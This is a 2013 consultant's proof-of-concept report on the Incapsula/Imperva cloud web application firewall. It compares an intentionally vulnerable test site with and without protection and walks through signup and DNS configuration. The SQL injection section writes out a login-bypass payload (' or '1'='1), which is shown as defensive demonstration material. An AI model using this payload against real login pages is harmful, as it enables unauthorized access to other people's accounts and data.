c waf poc research report - wordpress.com · incapsula / imperva cloud waf poc & research...
TRANSCRIPT
INCAPSULA / IMPERVA
CLOUD WAF POC
&
RESEARCH REPORT
Michael Kaishar | Security Consultant
April, 2013: Version 1.0
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
2
Table of Contents
Introduction .................................................................................................. 3
POC Objective ......................................................................................................... 3
POC Design ............................................................................................................. 3
POC Limitations ....................................................................................................... 3
POC High Level Solution Architecture ................................................................ 4
Traditional Firewall Configuration ............................................................................... 4
Incapsula/Imperva Cloud WAF Configuration ............................................................... 4
POC Implementation ...................................................................................... 5
Configuring the Cloud WAF to Ignore Malicious Traffic .................................................. 5
Set up and Configuration of the Cloud WAF Managed Service Solution ............................ 7
Demonstrating website protection using the Cloud WAF .............................................. 11
Additional Features and Benefits .............................................................................. 12
Conclusion .................................................................................................. 13
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
3
Introduction
Being connected to the Internet, and having a web presence in order to conduct business is potentially
risky due to the fact that web attacks are constant threats to any organization. Realistically, given
today’s emerging threats, how can organizations maintain and protect their websites from hackers,
malicious bots, scrapers, comment spammers, and denial of service attacks, and, at the same time be
able to allow legitimate traffic to pass through, while complying with regulatory mandates?
There are numerous solutions, but the smartest, fastest, and easiest solution is to implement Web
Application Firewalls as security measures. The following research report documents the results and
recommendations for the Cloud Web Application Firewall (WAF) Managed Service provided by
Incapsula/Imperva.
POC Objective
The aim for this POC is to illustrate the functionality of the Incapsula/Imperva Cloud WAF Managed
Service, and to provide with sufficient information in order to determine whether the
Incapsula/Imperva Cloud WAF Managed Service is a viable security solution.
POC Design
The Team has created an intentionally vulnerable website running in the
environment. The website URL is: The idea is to implement the
Incapsula/Imperva Cloud WAF Managed Service and to illustrate the successful protection of the
vulnerable website without fixing any of the application code. The POC demonstrates before and after
situations where the website is not protected at first, and then later, when the website is being
protected by the Incapsula/Imperva Cloud WAF Managed Service.
POC Limitations
Typically organizations should follow industry best practices in securing any devices and applications.
The scope of the following research is limited to a high-level technical implementation, evaluation, and
demonstration of the Incapsula/Imperva Cloud WAF Managed Service and does not attempt to offer
any detailed or in-depth information on network security and secure coding practices.
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
4
POC High Level Solution Architecture
Traditional Firewall Configuration
Figure 1 illustrates a typical network architecture where a traditional firewall is configured as a
security measure. Traditional firewalls are not capable of preventing malicious http(s) level attacks
such as: SQL Injection, Cross-Site Scripting, Cross-Site Request Forgery, Illegal Resource Access, and
Remote File Inclusion. The is an intentionally vulnerable web application for
the purposes of this POC. The traditional firewall will not block any malicious http(s) requests.
Examples of some of these http(s) level attacks are demonstrated later in this report.
Figure 1: Traditional Firewall Configuration
Incapsula/Imperva Cloud WAF Configuration
Figure 2 illustrates the addition of the Incapsula/Imperva Cloud WAF Managed Service. All traffic
flows through the Incapsula/Imperva cloud WAF. The malicious-traffic is detected and blocked, while
non-malicious legitimate traffic is passed through to the client. The cloud WAF is implemented
through a DNS change. Instead of resolving directly to the original IP Address of the website, the DNS
is changed to point to the cloud WAF IP Address.
Figure 2: Incapsula/Imperva Cloud WAF Configuration
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
5
POC Implementation
Configuring the Cloud WAF to Ignore Malicious Traffic
The following is a demonstration of malicious attacks that hackers might use. These attacks are for
demonstration purposes only and were carried out against the test website
In order to simulate the non-existence of the cloud WAF Managed
Solution, the cloud WAF was configured to ignore malicious traffic. This was done in order to illustrate
what a successful attack looks like. The Appendix section in this report defines cross-site scripting and
SQL injection attacks.
Figure 3 illustrates a successful cross-site scripting injection attack that was not blocked due to the
fact that the web application is vulnerable to such attacks as well as the ‘simulated’ non-existence of
the cloud WAF to block such malicious requests. This is a simple basic attack where a hacker would
test if a site is vulnerable or not.
Figure 3: Successful cross-site scripting attack
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
6
Figure 4 illustrates a very simple SQL injection attack using ‘ or ‘1’=’1 to successfully login to the
site without creating any account and therefore bypassing any application requirements.
Figure 4: Successful SQL Injection attack
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
7
Set up and Configuration of the Cloud WAF Managed Service Solution
Setting up and configuring the Incapsula/Imperva Cloud WAF Managed Service is extremely easy and
straight-forward.
1. Sign up at https://my.incapsula.com/sign-up. Once the registration is completed an email is
sent to the email address used during the registration process.
2. Once registered and validated, browse to https://my.incapsula.com and enter the username
and password to Sign-in to the service.
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
8
3. Now it’s time to activate the Incapsula/Imperva Cloud WAF by adding a domain address to be
protected and clicking NEXT>. In this case the domain has already
been added and configured.
4. Once a website is added it goes through an automatic configuration process as illustrated.
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
9
5. Once the automated process is completed, a simple change to the domain’s DNS records will
have to be made in order to point the website to the Incapsula/Imperva Cloud WAF Managed
Service. Step by Step instructions are sent out on how to complete this task. The DNS
transition phase can take up to several hours. Once the DNS changes take effect, an email
notification is sent out.
6. The image below illustrates that the DNS changes have taken effect.
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
10
7. The image below illustrates the current as being effectively
protected by the Incapsula/Imperva Cloud WAF Managed Service.
8. Configuring the Cloud WAF is simple. Choose Block Request for all the different attacks.
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
11
Demonstrating website protection using the Cloud WAF
Previously it was demonstrated that the website was successfully
attacked and compromised using very simple cross-site scripting and SQL injection attack methods
without having the Incapsula/Imperva Cloud WAF Managed Service protecting the site.
Figure 5 illustrates that the Incapsula/Imperva Cloud WAF has successfully protected the
website from a cross-site scripting attack. In addition an email alert
is sent out to the respective parties configured to receive the notifications.
Figure 5: Unsuccessful cross-site scripting attack
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
12
Additional Features and Benefits
There are many more features to the Incapsula/Imperva Cloud WAF Managed Service offering in
addition to the protection from SQL Injection, Cross-Site Scripting, and Illegal Resource Access. The
additional features include the following:
• Backdoor Protect: Currently in BETA mode is used to detect and quarantine backdoors
uploaded to a protected website.
• DDoS Mitigation: Used to detect and stop distributed denial of service attacks on a
protected website.
• PCI 6.6 Compliance: According to Incapsula/Imperva “the PCI DSS offers two alternatives
for meeting requirement 6.6. Either Install a WAF in front of your website or perform an
application code review. For most merchants, application code reviews are costly, impractical
and therefore out of the question. A WAF is clearly preferable, but traditional WAF solutions
require in-depth IT and security knowledge and resources that not all companies have.”
• Website Performance Enhancement: According to Incapsula/Imperva “on average,
websites using Incapsula are 40% faster and consume 50% less bandwidth.”
• Analytics and Monitoring: Real time analytics for website traffic, performance and threats.
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
13
Conclusion
The Incapsula/Imperva Cloud WAF Managed Service offers an easy and robust solution to protect
websites. In addition to the ease-of-use and great dashboard design, the solution also provides a
powerful reporting feature that gives detailed information as well as attack analytics. Although the
testing and evaluation was carried out at a high level for this POC; the Incapsula/Imperva Cloud WAF
Managed Service solution would be a welcomed addition to the The
Incapsula/Imperva Cloud WAF solution is a great product.